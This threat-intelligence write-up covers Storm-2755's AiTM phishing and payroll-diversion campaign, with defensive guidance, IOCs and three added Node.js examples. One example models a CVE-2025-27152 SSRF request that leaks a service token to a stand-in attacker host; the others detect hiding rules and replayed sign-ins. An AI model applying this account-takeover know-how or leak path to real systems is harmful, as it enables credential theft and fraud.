Storm-2755 is a financially motivated threat actor, first observed in April 2026, that runs a payroll diversion campaign against Canadian employees. The campaign does not exploit a flaw in Microsoft 365 or Microsoft Entra ID itself: it uses adversary-in-the-middle (AiTM) phishing to capture authenticated sessions and then replays them with tooling whose user-agent identifies it as Axios 1.7.9, a release in the range affected by CVE-2025-27152 (SSRF and credential leakage through absolute-URL handling). The objective is quiet takeover of corporate accounts and redirection of employee salary payments.
The operation runs as follows. Fake Microsoft 365 login pages are promoted through malicious advertisements and search-engine manipulation; the pages proxy the real sign-in and capture the resulting session tokens, which lets the actor bypass multi-factor authentication (MFA). Once inside an account, Storm-2755 keeps access by refreshing the stolen session tokens, searches for payroll and human resources data, creates inbox rules to hide its activity, and finally changes direct deposit details, either by social-engineering the HR team or by editing the information directly in a payroll system such as Workday.
Initial access targets Canadian employees through malicious advertisements and search-engine manipulation that push fraudulent Microsoft 365 login pages. The pages look legitimate because they are reverse proxies sitting between the victim and the real Microsoft sign-in flow: the victim completes a genuine login, including the MFA prompt, and the proxy captures the session cookies that Microsoft issues at the end of it. Storm-2755 therefore obtains working authenticated sessions rather than bare username and password pairs, which is why conventional MFA does not stop it.
CVE-2025-27152 is a vulnerability in Axios releases before 1.8.2 (and before 0.30.0 on the 0.x line): when a request's url is an absolute URL, the client ignores the configured baseURL, so an application that builds request paths from user-controlled input can be made to send its request, including any attached credentials and headers, to an attacker-chosen host (SSRF and credential leakage). The actor's session-replay tooling identifies itself as axios/1.7.9, a release inside that affected range. It uses the client to present the captured session cookies and OAuth tokens to legitimate Microsoft 365 endpoints, replaying an already-authenticated session; this sidesteps any MFA method that is not phishing-resistant, because the victim already satisfied the MFA challenge on the proxied page. For defenders the CVE matters in two ways: the version string is a fingerprint of the tooling, and the vulnerability is a separate hygiene item for any Axios deployment of your own.
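To make the CVE-2025-27152 mechanism concrete, the following is an added example and not code from Microsoft's write-up or from the Axios project. It re-implements the three small helpers that Axios uses to decide which host a request goes to (isAbsoluteURL, combineURLs, buildFullPath, named after Axios's own), models a server-side endpoint that forwards a client-supplied path through a credentialed client, and shows the vulnerable behaviour next to the fixed-release behaviour with allowAbsoluteUrls set to false. The hosts and the token value are constructed.

```javascript
// Added example, not code from Microsoft's write-up or from the Axios project:
// a re-implementation of the small Axios helpers that decide which host a
// request goes to, so the CVE-2025-27152 behaviour can be seen offline.
// Helper names mirror Axios's own; the hosts and token below are constructed.

function isAbsoluteURL(url) {
  // Matches "scheme://..." and protocol-relative "//..." (the test Axios uses).
  return /^([a-z][a-z\d+\-.]*:)?\/\//i.test(url);
}

function combineURLs(baseURL, relativeURL) {
  return relativeURL
    ? baseURL.replace(/\/?\/$/, '') + '/' + relativeURL.replace(/^\/+/, '')
    : baseURL;
}

// Before 1.8.2 an absolute `url` always replaced `baseURL`. The fixed releases
// add `allowAbsoluteUrls`; only when it is false is an absolute `url` appended
// to `baseURL` instead. Its default remains true, so upgrading alone is not enough.
function buildFullPath(baseURL, requestedURL, allowAbsoluteUrls = true) {
  const isRelative = !isAbsoluteURL(requestedURL);
  if (baseURL && (isRelative || allowAbsoluteUrls === false)) {
    return combineURLs(baseURL, requestedURL);
  }
  return requestedURL;
}

// Models a server-side endpoint that forwards a client-supplied path through an
// Axios instance carrying a service credential: the classic SSRF shape.
function forward(userSuppliedPath, options = {}) {
  const instance = {
    baseURL: 'https://api.internal.example',                    // constructed
    headers: { Authorization: 'Bearer svc-token-constructed' }, // constructed
  };
  const target = buildFullPath(instance.baseURL, userSuppliedPath, options.allowAbsoluteUrls);
  // Resolve against baseURL so a protocol-relative target gets a scheme.
  const host = new URL(target, instance.baseURL).host;
  return {
    target,
    host,
    // The Authorization header travels with the request, so any host other
    // than the intended API receives the service credential.
    credentialLeaked: host !== new URL(instance.baseURL).host,
  };
}

// Version-independent hardening: refuse anything that is not a plain relative
// path before it reaches the client, instead of relying on library defaults.
function assertRelativePath(path) {
  if (typeof path !== 'string' || isAbsoluteURL(path)) {
    throw new Error(`refusing non-relative path: ${path}`);
  }
  return path;
}

// Walk-through with constructed inputs.
const leaked = forward('https://attacker.example/collect');     // host: attacker.example
const alsoLeaked = forward('//attacker.example/collect');       // host: attacker.example
const contained = forward('https://attacker.example/collect', { allowAbsoluteUrls: false });
const safe = forward(assertRelativePath('/v1/payroll/deposits'));
console.log({ leaked, alsoLeaked, contained, safe });
```

Run it with `node` and compare the `host` field of the four results: the first two go to the attacker's host with the service token attached, the third stays on the internal API because the absolute URL was appended to baseURL, and the fourth never reaches the client with anything but a relative path. The protocol-relative case is worth remembering when writing allow-lists; a check for `https://` alone misses it.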
After initial access, Storm-2755 keeps the account by continuously refreshing the stolen session tokens, which looks like ordinary token renewal and does not trip typical alerts. The approach is malware-free: the actor relies only on legitimate authentication mechanisms and stolen session credentials, so there is no endpoint artifact to detect. In some cases it strengthens its foothold by changing the account password or authentication settings, such as the registered MFA methods, so that access survives even if the victim becomes suspicious.
Inside the compromised mailbox, Storm-2755 searches email and internal collaboration platforms for payroll data, direct deposit forms, HR contact details and credentials for financial systems. To stay unnoticed it creates inbox rules that match financial keywords such as "direct deposit", "bank" and "payroll" and route the matching messages to folders the user rarely opens, so the victim sees neither the attacker's correspondence with HR nor the notifications about account and banking changes.
The final stage is the payroll diversion itself, carried out in one of two ways. Most often Storm-2755 sends spearphishing emails from the compromised account to HR or finance staff requesting a change of direct deposit banking details under a plausible pretext. Because the messages originate from a genuine employee mailbox they carry built-in credibility, and HR personnel are more likely to process the fraudulent update without out-of-band verification.
Where social engineering fails or is not practical, Storm-2755 signs in to the HR platform, such as Workday, with the compromised identity and edits the direct deposit details directly, pointing salary payments at an attacker-controlled bank account. The theft materializes at the next payroll run, and typically nobody notices until the employee reports a missing payment.
For accounts showing Storm-2755 indicators, particularly sign-ins with the Axios user-agent string or connections to bluegraintours[.]com, immediately revoke all active sessions and refresh tokens; note that access tokens already issued remain valid until they expire unless Continuous Access Evaluation enforces the revocation on CAE-capable clients. Audit mailbox rules across the organization for rules that match financial keywords such as "direct deposit", "bank" and "payroll" and move or delete the matching messages; remove unauthorized rules and restore the suppressed mail, which may include the HR confirmations of the fraudulent change. Reset passwords and re-register all MFA methods for affected accounts, since the actor may have added its own.
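The mailbox-rule audit above can be run offline against an exported rule set. The following Node.js script is an added example, not code from Microsoft's write-up or from any product; it assumes a JSON export of Exchange Online Get-InboxRule output (the Name, Enabled, *ContainsWords, MoveToFolder, DeleteMessage and MarkAsRead properties), the keyword and low-visibility-folder lists are assumptions to tune for your tenant, and the three sample rules are constructed. It rates a rule high when financial keywords are combined with an action that hides the message, medium when a hiding rule has a near-empty name, and low when a financial filter merely moves mail to a normal folder.

```javascript
// Added example, not from Microsoft's write-up: an offline audit of exported
// inbox rules for the hiding pattern described above. The record shape assumes
// a JSON export of Exchange Online Get-InboxRule output (Name, Enabled, the
// *ContainsWords conditions, MoveToFolder, DeleteMessage, MarkAsRead); the
// keyword and folder lists are assumptions and the sample rules are constructed.

const FINANCIAL_KEYWORDS = [
  'direct deposit', 'bank', 'payroll', 'paycheck', 'routing number', 'workday',
];

// Folders users rarely open; attacker-created rules route mail here.
const LOW_VISIBILITY_FOLDERS = [
  'rss feeds', 'rss subscriptions', 'conversation history', 'archive',
  'junk email', 'deleted items', 'notes',
];

// Get-InboxRule renders folders as "mailbox:\Folder"; keep only the leaf name.
function folderLeaf(value) {
  return String(value || '').replace(/^.*\\/, '').trim().toLowerCase();
}

function conditionWords(rule) {
  const fields = ['SubjectContainsWords', 'SubjectOrBodyContainsWords',
                  'BodyContainsWords', 'FromAddressContainsWords'];
  return fields.flatMap((f) => rule[f] || []).map((w) => String(w).toLowerCase());
}

// The action, if any, that keeps a matching message out of the owner's sight.
function hidingAction(rule) {
  if (rule.DeleteMessage) return 'DeleteMessage';
  if (rule.MoveToFolder && LOW_VISIBILITY_FOLDERS.includes(folderLeaf(rule.MoveToFolder))) {
    return `MoveToFolder:${folderLeaf(rule.MoveToFolder)}`;
  }
  if (rule.MarkAsRead && !rule.MoveToFolder) return 'MarkAsRead';
  return null;
}

const ORDER = ['high', 'medium', 'low'];

function auditInboxRules(rules) {
  const findings = [];
  for (const rule of rules) {
    const words = conditionWords(rule);
    const keywords = FINANCIAL_KEYWORDS.filter((k) => words.some((w) => w.includes(k)));
    const action = hidingAction(rule);
    // Attacker rules are often named with a single character so they look empty.
    const blankName = String(rule.Name || '').trim().length <= 1;
    let severity = null;
    if (keywords.length && action) severity = 'high';               // the Storm-2755 pattern
    else if (action && blankName) severity = 'medium';              // hiding rule, odd name
    else if (keywords.length && rule.MoveToFolder) severity = 'low'; // financial filter, visible folder
    if (!severity) continue;
    findings.push({
      mailbox: rule.MailboxOwnerId, name: rule.Name, enabled: Boolean(rule.Enabled),
      severity, keywords,
      action: action || `MoveToFolder:${folderLeaf(rule.MoveToFolder)}`,
    });
  }
  return findings.sort((a, b) => ORDER.indexOf(a.severity) - ORDER.indexOf(b.severity));
}

// Constructed sample export: one attacker-style rule, one ordinary filter and
// one legitimate rule that merely mentions a financial word.
const SAMPLE_RULES = [
  { MailboxOwnerId: 'jdoe@contoso.example', Name: '.', Enabled: true,
    SubjectOrBodyContainsWords: ['direct deposit', 'bank', 'payroll'],
    MoveToFolder: 'jdoe@contoso.example:\\RSS Feeds', MarkAsRead: true, StopProcessingRules: true },
  { MailboxOwnerId: 'jdoe@contoso.example', Name: 'Newsletters', Enabled: true,
    FromAddressContainsWords: ['news@'], MoveToFolder: 'jdoe@contoso.example:\\Newsletters' },
  { MailboxOwnerId: 'asmith@contoso.example', Name: 'Bank statements', Enabled: true,
    SubjectContainsWords: ['bank statement'], MoveToFolder: 'asmith@contoso.example:\\Finance' },
];
console.log(JSON.stringify(auditInboxRules(SAMPLE_RULES), null, 2));
```

On the sample data the "." rule is reported as high (three keyword matches, moved to RSS Feeds) and the "Bank statements" rule as low, while the newsletter filter is ignored. Disabled rules are still reported, because an attacker rule that was disabled rather than deleted is evidence in its own right.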
In Microsoft Entra ID, enforce Conditional Access policies that require device compliance, block sign-ins from unmanaged devices, and apply sign-in frequency and session lifetime controls so that stolen tokens expire sooner and reauthentication is forced at short intervals. Enable Continuous Access Evaluation (CAE) so that access tokens are re-evaluated and revoked in near real time when conditions change, for instance when user risk rises or a session anomaly is detected. Block legacy authentication protocols, which cannot enforce MFA or Conditional Access. The durable countermeasure against AiTM phishing is phishing-resistant MFA (FIDO2 security keys, passkeys, Windows Hello for Business or certificate-based authentication) enforced through an authentication strength policy: the authenticator refuses to sign for the phishing site's origin, so the proxied login never completes and there is no session to steal.
In SIEM and XDR platforms, alert on sign-in events whose user-agent contains "axios" (observed here as axios/1.7.9), especially non-interactive sign-ins to the OfficeHome application, which is the key Storm-2755 indicator. Add behavioral analytics for inbox-rule creation shortly after an authentication event, access to payroll-related documents from unusual locations or at unusual times, and sudden changes to direct deposit information. Monitor for connections to bluegraintours[.]com and subscribe to threat intelligence feeds to pick up new Storm-2755 infrastructure.
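The following Node.js script is an added example of that detection logic, not code from Microsoft's write-up or from any SIEM; it runs offline over constructed records. Sign-ins use a subset of the Microsoft Graph signIn fields (userPrincipalName, createdDateTime, userAgent, appDisplayName, isInteractive, ipAddress), audit events mimic unified audit log entries for New-InboxRule with their Parameters array, and the refang helper turns the defanged indicator above back into a matchable hostname. Every user, address and timestamp is constructed; the 30-minute correlation window is an assumption.

```javascript
// Added example, not from Microsoft's write-up: the detection logic described
// above, run offline over constructed records. Sign-ins use a subset of the
// Microsoft Graph signIn fields (userPrincipalName, createdDateTime, userAgent,
// appDisplayName, isInteractive, ipAddress); audit events mimic unified audit
// log entries for New-InboxRule. Every user, IP and timestamp is constructed.

// Threat-intel feeds defang domains as "example[.]com"; restore them for matching.
function refang(indicator) {
  return indicator.replace(/\[\.\]/g, '.').replace(/^hxxps?:\/\//i, '').toLowerCase();
}

const IOC_DOMAINS = ['bluegraintours[.]com'].map(refang); // from the indicators on this page

function isAxiosUserAgent(userAgent) {
  return /(^|[\s;(])axios\/\d+\.\d+/i.test(userAgent || '');
}

// Reasons a single sign-in looks like Storm-2755 replay; empty when benign.
function signInReasons(signIn) {
  const reasons = [];
  if (isAxiosUserAgent(signIn.userAgent)) {
    reasons.push(`scripted client user-agent "${signIn.userAgent}"`);
    if (signIn.appDisplayName === 'OfficeHome' && signIn.isInteractive === false) {
      reasons.push('non-interactive sign-in to OfficeHome (session replay pattern)');
    }
  }
  return reasons;
}

// The unified audit log stores cmdlet arguments as Parameters [{Name, Value}].
function auditParam(event, name) {
  const p = (event.Parameters || []).find((x) => x.Name === name);
  return p ? p.Value : undefined;
}

// Flag suspicious sign-ins and escalate when the same user creates an inbox
// rule within `windowMinutes` afterwards (30 minutes is an assumed window).
function detect(signIns, auditEvents, windowMinutes = 30) {
  const findings = [];
  for (const s of signIns) {
    const reasons = signInReasons(s);
    if (reasons.length === 0) continue;
    const start = Date.parse(s.createdDateTime);
    const rulesAfter = auditEvents.filter((a) => {
      const delta = Date.parse(a.CreationTime) - start;
      return a.Operation === 'New-InboxRule' &&
        a.UserId.toLowerCase() === s.userPrincipalName.toLowerCase() &&
        delta >= 0 && delta <= windowMinutes * 60 * 1000;
    });
    for (const a of rulesAfter) {
      const mins = Math.round((Date.parse(a.CreationTime) - start) / 60000);
      reasons.push(`inbox rule "${auditParam(a, 'Name')}" created ${mins} min after sign-in`);
    }
    findings.push({
      user: s.userPrincipalName, time: s.createdDateTime, ip: s.ipAddress,
      severity: rulesAfter.length ? 'critical' : 'high', reasons,
    });
  }
  return findings;
}

// Match proxy or DNS log hostnames against the IOC list, subdomains included.
function matchesIoc(hostname) {
  const h = hostname.toLowerCase();
  return IOC_DOMAINS.some((d) => h === d || h.endsWith('.' + d));
}

// Constructed sample data (RFC 5737 test addresses, fictional tenant).
const SAMPLE_SIGNINS = [
  { userPrincipalName: 'jdoe@contoso.example', createdDateTime: '2026-04-07T08:14:02Z',
    userAgent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0', appDisplayName: 'OfficeHome',
    isInteractive: true, ipAddress: '198.51.100.23' },
  { userPrincipalName: 'jdoe@contoso.example', createdDateTime: '2026-04-07T13:02:11Z',
    userAgent: 'axios/1.7.9', appDisplayName: 'OfficeHome',
    isInteractive: false, ipAddress: '203.0.113.45' },
  { userPrincipalName: 'asmith@contoso.example', createdDateTime: '2026-04-07T13:05:44Z',
    userAgent: 'axios/1.7.9', appDisplayName: 'Microsoft Graph',
    isInteractive: false, ipAddress: '203.0.113.45' },
];
const SAMPLE_AUDIT = [
  { CreationTime: '2026-04-07T13:09:30Z', Operation: 'New-InboxRule', UserId: 'jdoe@contoso.example',
    Parameters: [{ Name: 'Name', Value: '.' },
                 { Name: 'SubjectOrBodyContainsWords', Value: 'direct deposit;bank;payroll' },
                 { Name: 'MoveToFolder', Value: 'RSS Feeds' }] },
  { CreationTime: '2026-04-06T09:00:00Z', Operation: 'New-InboxRule', UserId: 'asmith@contoso.example',
    Parameters: [{ Name: 'Name', Value: 'Newsletters' }, { Name: 'MoveToFolder', Value: 'Newsletters' }] },
];
console.log(JSON.stringify(detect(SAMPLE_SIGNINS, SAMPLE_AUDIT), null, 2));
```

On the sample data the jdoe sign-in is rated critical (Axios user-agent, non-interactive OfficeHome, inbox rule "." created seven minutes later), the asmith sign-in is rated high on the user-agent alone, and the interactive browser sign-in produces nothing. The same correlation translates directly into a SIEM join between the sign-in and audit tables on the user principal name.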
Organizations that use the Axios HTTP client in their own applications should upgrade to version 1.8.2 or later (0.30.0 or later on the legacy branch) to address CVE-2025-27152. Upgrading alone does not change the default behavior: the fixed releases add the allowAbsoluteUrls option, and it must be set to false on any instance that builds requests from untrusted input. Inventory all applications and services that bundle Axios so that no unpatched instance remains. This is hygiene for your own code base rather than a direct block on Storm-2755, whose Axios-based tooling is the attacker's own; the campaign's actionable Axios artifact is the user-agent string in your sign-in logs.
Domain: bluegraintours[.]com
User-Agent: axios/1.7.9
Add these indicators to security monitoring tools, proxy blocklists and threat intelligence platforms to detect and block ongoing Storm-2755 activity.
Storm-2755 maps to MITRE ATT&CK techniques across the whole attack lifecycle. During Resource Development it uses T1608.005 (Stage Capabilities: Link Target) to stage the fake Microsoft 365 login pages and T1583.001 (Acquire Infrastructure: Domains) to acquire infrastructure including bluegraintours[.]com. For Initial Access it uses T1566.003 (Phishing: Spearphishing via Service) and T1189 (Drive-by Compromise) through the malicious search advertisements.
Credential access relies on T1557 (Adversary-in-the-Middle) phishing proxies and T1539 (Steal Web Session Cookie) to capture session tokens. Persistence is established through T1078.004 (Valid Accounts: Cloud Accounts) with the stolen sessions and T1098 (Account Manipulation) by changing authentication settings. Reconnaissance uses T1087 (Account Discovery) and T1114.002 (Email Collection: Remote Email Collection).
For Defense Evasion the actor uses T1564.008 (Hide Artifacts: Email Hiding Rules) to conceal its activity. It moves laterally with T1534 (Internal Spearphishing) and achieves its objective through T1657 (Financial Theft) by manipulating payroll systems.
Microsoft Security Blog: Investigating Storm-2755 Payroll Pirate Attacks Targeting Canadian Employees https://www.microsoft.com/en-us/security/blog/2026/04/09/investigating-storm-2755-payroll-pirate-attacks-targeting-canadian-employees/
GitHub Security Advisory: GHSA-jr5f-v2jv-69x6 (CVE-2025-27152) https://github.com/advisories/GHSA-jr5f-v2jv-69x6
Axios Security Patch Release v1.8.2 https://github.com/axios/axios/releases/tag/v1.8.2